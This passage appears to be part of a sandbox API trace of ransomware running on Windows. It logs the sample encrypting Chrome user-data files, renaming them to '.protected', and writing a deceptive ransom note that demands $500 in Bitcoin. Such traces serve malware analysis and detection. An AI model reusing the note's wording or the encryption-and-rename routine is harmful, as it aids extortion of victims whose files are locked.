pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal.protected") returned 115 [0084.496] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing channel ids-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Channel IDs-journal.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing channel ids-journal.protected")) returned 1 [0084.497] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.497] lstrcmpiW (lpString1="Safe Browsing Cookies", lpString2="Windows") returned -1 [0084.497] lstrcmpiW (lpString1="Safe Browsing Cookies", lpString2="Program Files") returned 1 [0084.497] lstrcmpiW (lpString1="Safe Browsing Cookies", lpString2="Program Files (x86)") returned 1 [0084.497] lstrcmpiW (lpString1="Safe Browsing Cookies", lpString2="$Recycle.bin") returned 1 [0084.497] lstrcmpiW (lpString1="Safe Browsing Cookies", lpString2="System Volume Information") returned -1 [0084.497] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies") returned 93 [0084.497] StrStrIW (lpFirst="Safe Browsing Cookies", lpSrch=".protected") returned 0x0 [0084.497] lstrcmpW (lpString1="Safe Browsing Cookies", lpString2="RESTORE_FILES.txt") returned 1 [0084.497] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.497] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.497] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing cookies"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.497] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies") returned 93 [0084.497] StrStrW (lpFirst="Safe Browsing Cookies", lpSrch=".txt") returned 0x0 [0084.497] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies") returned 93 [0084.497] StrStrW (lpFirst="Safe Browsing Cookies", lpSrch=".rar") returned 0x0 [0084.497] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies") returned 93 [0084.497] StrStrW (lpFirst="Safe Browsing Cookies", lpSrch=".zip") returned 0x0 [0084.497] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x1c00, lpOverlapped=0x0) returned 1 [0084.500] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffe400, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.500] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x1c00, lpOverlapped=0x0) returned 1 [0084.500] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.500] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.500] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.500] CloseHandle (hObject=0x150) returned 1 [0084.501] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies.protected") returned 103 [0084.501] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing cookies"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing cookies.protected")) returned 1 [0084.501] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.501] lstrcmpiW (lpString1="Safe Browsing Cookies-journal", lpString2="Windows") returned -1 [0084.501] lstrcmpiW (lpString1="Safe Browsing Cookies-journal", lpString2="Program Files") returned 1 [0084.501] lstrcmpiW (lpString1="Safe Browsing Cookies-journal", lpString2="Program Files (x86)") returned 1 [0084.501] lstrcmpiW (lpString1="Safe Browsing Cookies-journal", lpString2="$Recycle.bin") returned 1 [0084.501] lstrcmpiW (lpString1="Safe Browsing Cookies-journal", lpString2="System Volume Information") returned -1 [0084.501] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal") returned 101 [0084.501] StrStrIW (lpFirst="Safe Browsing Cookies-journal", lpSrch=".protected") returned 0x0 [0084.501] lstrcmpW (lpString1="Safe Browsing Cookies-journal", lpString2="RESTORE_FILES.txt") returned 1 [0084.501] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.501] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.501] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing cookies-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.502] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal") returned 101 [0084.502] StrStrW (lpFirst="Safe Browsing Cookies-journal", lpSrch=".txt") returned 0x0 [0084.502] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal") returned 101 [0084.502] StrStrW (lpFirst="Safe Browsing Cookies-journal", lpSrch=".rar") returned 0x0 [0084.502] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal") returned 101 [0084.502] StrStrW (lpFirst="Safe Browsing Cookies-journal", lpSrch=".zip") returned 0x0 [0084.502] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0084.502] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.502] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0084.502] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.502] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.503] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.503] CloseHandle (hObject=0x150) returned 1 [0084.503] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal.protected") returned 111 [0084.503] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing cookies-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Safe Browsing Cookies-journal.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\safe browsing cookies-journal.protected")) returned 1 [0084.503] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.503] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2="Windows") returned -1 [0084.503] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2="Program Files") returned 1 [0084.503] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2="Program Files (x86)") returned 1 [0084.503] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2="$Recycle.bin") returned 1 [0084.503] lstrcmpiW (lpString1="SSLErrorAssistant", lpString2="System Volume Information") returned -1 [0084.503] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned 89 [0084.503] lstrcmpW (lpString1="SSLErrorAssistant", lpString2=".") returned 1 [0084.504] lstrcmpW (lpString1="SSLErrorAssistant", lpString2="..") returned 1 [0084.504] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\*") returned 91 [0084.504] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.504] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.504] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.504] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.504] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.504] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.504] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\.") returned 91 [0084.504] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.504] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.504] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.504] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.504] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.504] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.504] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.504] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\..") returned 92 [0084.504] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.504] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.504] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.504] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.504] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\RESTORE_FILES.txt") returned 107 [0084.504] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\sslerrorassistant\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.505] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.505] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.506] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.506] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0084.506] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.506] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0084.506] CloseHandle (hObject=0x150) returned 1 [0084.506] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.506] lstrcmpiW (lpString1="SwReporter", lpString2="Windows") returned -1 [0084.506] lstrcmpiW (lpString1="SwReporter", lpString2="Program Files") returned 1 [0084.506] lstrcmpiW (lpString1="SwReporter", lpString2="Program Files (x86)") returned 1 [0084.506] lstrcmpiW (lpString1="SwReporter", lpString2="$Recycle.bin") returned 1 [0084.506] lstrcmpiW (lpString1="SwReporter", lpString2="System Volume Information") returned -1 [0084.506] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter") returned 82 [0084.506] lstrcmpW (lpString1="SwReporter", lpString2=".") returned 1 [0084.506] lstrcmpW (lpString1="SwReporter", lpString2="..") returned 1 [0084.506] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\*") returned 84 [0084.506] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.506] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.506] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.506] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.506] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.506] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.506] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\.") returned 84 [0084.507] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.507] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.507] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.507] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.507] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.507] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.507] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.507] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\..") returned 85 [0084.507] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.507] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.507] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.507] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.507] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\RESTORE_FILES.txt") returned 100 [0084.507] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\swreporter\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.507] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.507] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.508] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.508] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0084.508] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.508] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0084.508] CloseHandle (hObject=0x150) returned 1 [0084.508] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.508] lstrcmpiW (lpString1="WidevineCdm", lpString2="Windows") returned -1 [0084.508] lstrcmpiW (lpString1="WidevineCdm", lpString2="Program Files") returned 1 [0084.508] lstrcmpiW (lpString1="WidevineCdm", lpString2="Program Files (x86)") returned 1 [0084.508] lstrcmpiW (lpString1="WidevineCdm", lpString2="$Recycle.bin") returned 1 [0084.508] lstrcmpiW (lpString1="WidevineCdm", lpString2="System Volume Information") returned 1 [0084.508] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm") returned 83 [0084.508] lstrcmpW (lpString1="WidevineCdm", lpString2=".") returned 1 [0084.508] lstrcmpW (lpString1="WidevineCdm", lpString2="..") returned 1 [0084.508] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\*") returned 85 [0084.508] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.509] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.509] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.509] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.509] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.509] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.509] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\.") returned 85 [0084.509] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.509] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.509] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.509] lstrcmpiW 